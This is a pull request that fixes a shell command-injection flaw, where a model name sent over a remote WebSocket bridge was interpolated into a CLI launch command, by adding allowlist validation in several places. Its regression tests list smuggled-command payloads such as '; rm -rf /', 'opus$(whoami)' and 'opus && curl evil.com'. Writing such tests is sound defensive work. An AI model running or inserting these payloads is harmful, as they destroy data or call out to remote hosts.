### PR TITLE
fix(session): validate model against allowlist before shell interpolation

### DIFF
--- a/src/main/cli-manager.test.ts
+++ b/src/main/cli-manager.test.ts
@@ -205,6 +205,44 @@ describe('CLIManager deferred provider launch', () => {
   });
 });
 
+describe('CLIManager launchProviderCommand fallback — model flag injection guard (#116)', () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  // No `provider` is passed, so CLIManager falls back to its own copy of the
+  // --model-appending logic in launchProviderCommand(). options.model is
+  // untrusted (reachable over the remote WS bridge with only a token as
+  // gate); session-manager.ts gates it at the trust boundary, but this
+  // fallback path must also refuse to shell-interpolate a malicious value
+  // into the line written to the PTY.
+  it.each([
+    '; rm -rf /',
+    'opus`whoami`',
+    'opus$(whoami)',
+    'opus && curl evil.com',
+    'opus | tee /tmp/x',
+  ])('never writes a metacharacter-laden model (%j) into the launched command', async (maliciousModel) => {
+    const mgr = new CLIManager({
+      workingDirectory: '/tmp',
+      permissionMode: 'standard',
+      model: maliciousModel as unknown as import('../shared/ipc-types').ClaudeModel,
+    });
+    await mgr.spawn();
+    mgr.resize({ cols: 180, rows: 50 });
+
+    const written = writtenText();
+    expect(written).toContain('claude');
+    expect(written).not.toContain(maliciousModel);
+    expect(written).not.toMatch(/--model/);
+  });
+
+  it('still appends a well-formed model to the launched command', async () => {
+    const mgr = new CLIManager({ workingDirectory: '/tmp', permissionMode: 'standard', model: 'opus' as any });
+    await mgr.spawn();
+    mgr.resize({ cols: 180, rows: 50 });
+    expect(writtenText()).toContain('--model opus');
+  });
+});
+
 describe('CLIManager write() chunking (surrogate-pair safe)', () => {
   beforeEach(() => vi.clearAllMocks());
 

--- a/src/main/cli-manager.ts
+++ b/src/main/cli-manager.ts
@@ -5,6 +5,7 @@ import * as fs from 'fs';
 import { TerminalSize, PermissionMode, ClaudeModel, LaunchMode, SessionKind } from '../shared/ipc-types';
 import { detectModelFromOutput } from '../shared/model-detector';
 import type { IProvider } from './providers/provider';
+import { isSafeModelToken } from './providers/provider';
 
 /**
  * Read a fresh set of environment variables from the Windows registry.
@@ -462,8 +463,12 @@ export class CLIManager {
         }
       }
 
-      // Add model flag if specified (skip for 'auto' or 'agents' mode)
-      if (launchMode !== 'agents' && this.options.model && this.options.model !== 'auto') {
+      // Add model flag if specified (skip for 'auto' or 'agents' mode).
+      // isSafeModelToken is a defense-in-depth guard: session-manager.ts
+      // already gates request.model at the trust boundary, but this is the
+      // point where the value is shell-interpolated and written to the PTY,
+      // so it is checked again here too (issue #116).
+      if (launchMode !== 'agents' && this.options.model && this.options.model !== 'auto' && isSafeModelToken(this.options.model)) {
         command += ` --model ${this.options.model}`;
       }
     }

--- a/src/main/providers/claude-provider.test.ts
+++ b/src/main/providers/claude-provider.test.ts
@@ -73,6 +73,27 @@ describe('ClaudeProvider', () => {
       });
       expect(cmd).toBe('claude --dangerously-skip-permissions --model haiku');
     });
+
+    // Regression coverage for issue #116: options.model is untrusted (reachable
+    // over the remote WS bridge with only a token as gate) and is written
+    // straight into a PTY as `claude ... --model <value>`. A metacharacter in
+    // that value would let an attacker execute arbitrary shell commands.
+    // session-manager.ts is the primary gate, but buildCommand() must never
+    // trust its caller either.
+    it.each([
+      '; rm -rf /',
+      'opus`whoami`',
+      'opus$(whoami)',
+      'opus && curl evil.com',
+      'opus | tee /tmp/x',
+      'opus\nrm -rf /',
+      'opus with spaces',
+    ])('drops a metacharacter-laden model (%j) instead of appending it to the command', (maliciousModel) => {
+      const cmd = provider.buildCommand({ ...baseOptions, model: maliciousModel });
+      expect(cmd).toBe('claude');
+      expect(cmd).not.toContain(maliciousModel);
+      expect(cmd).not.toMatch(/[;`$|&\n]/);
+    });
   });
 
   describe('getReadinessPatterns()', () => {

--- a/src/main/providers/claude-provider.ts
+++ b/src/main/providers/claude-provider.ts
@@ -1,5 +1,5 @@
 import { execFile } from 'child_process';
-import { IProvider, ProviderCommandOptions } from './provider';
+import { IProvider, ProviderCommandOptions, isSafeModelToken } from './provider';
 import { ProviderId, ProviderInfo } from '../../shared/types/provider-types';
 import { CLAUDE_READY_PATTERNS } from '../../shared/claude-detector';
 import { WELCOME_PATTERNS, SWITCH_PATTERNS } from '../../shared/model-detector';
@@ -142,8 +142,12 @@ export class ClaudeProvider implements IProvider {
       }
     }
 
-    // Append model flag only for modes that support it (not 'agents' — the TUI manages its own model)
-    if (effectiveLaunchMode !== 'agents' && options.model && options.model !== 'auto') {
+    // Append model flag only for modes that support it (not 'agents' — the TUI manages its own model).
+    // isSafeModelToken is a defense-in-depth guard: session-manager.ts already
+    // gates request.model at the trust boundary, but this is the point where
+    // the value is shell-interpolated and written to a PTY, so it is checked
+    // again here in case a caller reaches buildCommand() directly (issue #116).
+    if (effectiveLaunchMode !== 'agents' && options.model && options.model !== 'auto' && isSafeModelToken(options.model)) {
       command += ` --model ${options.model}`;
     }
 

--- a/src/main/providers/provider.ts
+++ b/src/main/providers/provider.ts
@@ -29,3 +29,20 @@ export interface IProvider {
   getEnvironmentVariables(options?: { enableAgentTeams?: boolean }): Record<string, string>;
   normalizeModel(raw: string): string | null;
 }
+
+/**
+ * Last-line-of-defense charset check for a model token immediately before it
+ * is shell-interpolated into a `--model <value>` flag and written to a PTY
+ * (see claude-provider.ts#buildCommand and cli-manager.ts#launchProviderCommand).
+ *
+ * `request.model` is untrusted input reachable over the remote WS bridge with
+ * only a token as gate (see issue #116). The primary defense is gating at the
+ * trust boundary in session-manager.ts via `provider.normalizeModel()`, but
+ * every later interpolation site guards with this as well so a bypass of one
+ * layer doesn't translate into command injection.
+ */
+export const MODEL_TOKEN_PATTERN = /^[a-z0-9.\-]+$/i;
+
+export function isSafeModelToken(value: string | undefined): value is string {
+  return typeof value === 'string' && value.length > 0 && MODEL_TOKEN_PATTERN.test(value);
+}

--- a/src/main/session-manager.ts
+++ b/src/main/session-manager.ts
@@ -35,6 +35,7 @@ import type { GitManager } from './git-manager';
 import type { WorktreeSettings } from '../shared/types/git-types';
 import type { ProviderRegistry } from './providers/provider-registry';
 import type { IProvider } from './providers/provider';
+import { isSafeModelToken } from './providers/provider';
 
 const MAX_SESSIONS = 10;
 
@@ -243,7 +244,7 @@ export class SessionManager {
       addWorktreeToRegistry(worktreeInfo);
     }
 
-    const model = request.model;
+    const rawModel = request.model;
     const isShell = request.kind === 'shell';
 
     // Resolve the provider to use: explicit request > default 'claude'. Shell sessions have none.
@@ -255,6 +256,34 @@ export class SessionManager {
       } catch {
         console.warn(`[SessionManager] Provider '${providerId}' not found, using no provider`);
         provider = undefined;
+      }
+    }
+
+    // Gate `model` at this trust boundary before it is persisted to metadata
+    // and forwarded to CLIManager, which shell-interpolates it into
+    // `--model <value>` and writes the resulting line straight to a PTY
+    // (claude-provider.ts#buildCommand / cli-manager.ts#launchProviderCommand).
+    // request.model is untrusted input — reachable over the remote WS bridge
+    // with only a token as gate (issue #116) — so anything that isn't a known
+    // model name must never reach that write. Prefer the provider's own
+    // normalizeModel() (it understands aliases like '4-sonnet' -> 'sonnet');
+    // fall back to a strict charset check when no provider is resolved (or a
+    // test double doesn't implement it). Values that don't validate are
+    // dropped rather than rejected outright, matching the existing
+    // 'auto'/no-flag behavior for an absent model.
+    //
+    // normalizeModel()/isSafeModelToken() operate on `string`, not the
+    // narrower ClaudeModel union — SessionMetadata.model's ClaudeModel type is
+    // a compile-time convenience only and enforces nothing at runtime (that
+    // gap is exactly what issue #116 is about). The cast below is safe
+    // because `model` is only ever assigned a value that has already passed
+    // through one of the two runtime checks above.
+    let model: ClaudeModel | undefined;
+    if (rawModel) {
+      if (provider && typeof provider.normalizeModel === 'function') {
+        model = (provider.normalizeModel(rawModel) ?? undefined) as ClaudeModel | undefined;
+      } else {
+        model = (isSafeModelToken(rawModel) ? rawModel : undefined) as ClaudeModel | undefined;
       }
     }
 


### PR DESCRIPTION
Closes #116

## What this does (plain-language)

When you start a session, the model name (e.g. "opus", "sonnet") gets
plugged into the command line that launches the Claude Code CLI. That
value can arrive over the remote WebSocket bridge, protected only by a
token — there was no check that it actually looked like a real model
name before it landed in the command. A malicious value like
`` opus`whoami` `` or `opus && curl evil.com` could smuggle in extra
shell commands.

This PR adds a validation step in two places: once where the session is
first created (using each provider's own "is this a model I recognize"
logic), and again right before the value is written into the actual
command, as a backup in case the first check is ever skipped or bypassed.
Anything that isn't a recognized model name is just dropped — the
session still starts, just without a `--model` override (same as if no
model were specified at all).

## Changes
- `src/main/providers/provider.ts`: new `isSafeModelToken` charset guard
  (`/^[a-z0-9.\-]+$/i`) used as the last-line-of-defense check.
- `src/main/session-manager.ts`: gates `request.model` through
  `provider.normalizeModel()` (or the charset guard as fallback) before
  it's persisted to session metadata or handed to `CLIManager`.
- `src/main/providers/claude-provider.ts` (`buildCommand`) and
  `src/main/cli-manager.ts` (`launchProviderCommand` fallback path):
  re-check the value with `isSafeModelToken` immediately before
  interpolating it into the command string.
- Test files updated for both providers/cli-manager to cover the new
  guard, including a parametrized regression test with several
  metacharacter-laden payloads.

No new dependencies added — this only adds a small regex helper and a
few conditional checks.

## How I verified it
- `npx tsc --noEmit -p tsconfig.json` — clean
- `npx tsc --noEmit -p tsconfig.main.json` — clean
- `npx vitest run --config vitest.workspace.ts --project main` (full
  main-process suite, no filter): **43 test files / 549 tests, all
  passing** — no regressions, including the pre-existing tests that rely
  on a provider stub without `normalizeModel` still resolving
  `model: 'opus'` correctly.